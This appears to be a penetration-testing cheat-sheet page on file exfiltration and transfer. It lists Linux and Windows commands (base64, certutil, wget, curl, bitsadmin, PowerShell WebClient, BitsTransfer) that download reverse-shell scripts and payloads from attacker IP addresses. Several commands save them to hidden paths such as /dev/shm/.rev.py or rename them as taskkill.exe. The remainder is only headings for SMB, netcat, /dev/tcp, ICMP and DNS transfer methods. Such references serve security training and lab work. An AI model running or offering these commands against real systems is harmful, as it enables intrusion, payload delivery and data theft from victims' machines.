Exfiltration
Copy&Paste Base64
Linux
base64 -w0 <file> base64 -d file Windows
certutil -encode payload.dll payload.b64certutil -decode payload.b64 payload.dllHTTP
Linux
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.pywget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shmcurl 10.10.14.14:8000/shell.py -o /dev/shm/shell.pyfetch 10.10.14.14:8000/shell.py Windows
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf​(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"​Import-Module BitsTransferStart-BitsTransfer -Source $url -Destination $outputStart-BitsTransfer -Source $url -Destination $output -AsynchronousUpload files
HTTPS Server
FTP
FTP server (python)
FTP server (NodeJS)
FTP server (pure-ftp)
Windows client
SMB
SCP
NC
/dev/tcp
Download file from victim
Upload file to victim
ICMP
SMTP
TFTP
PHP
VBScript
Victim
Debug.exe
DNS
Last updated
Was this helpful?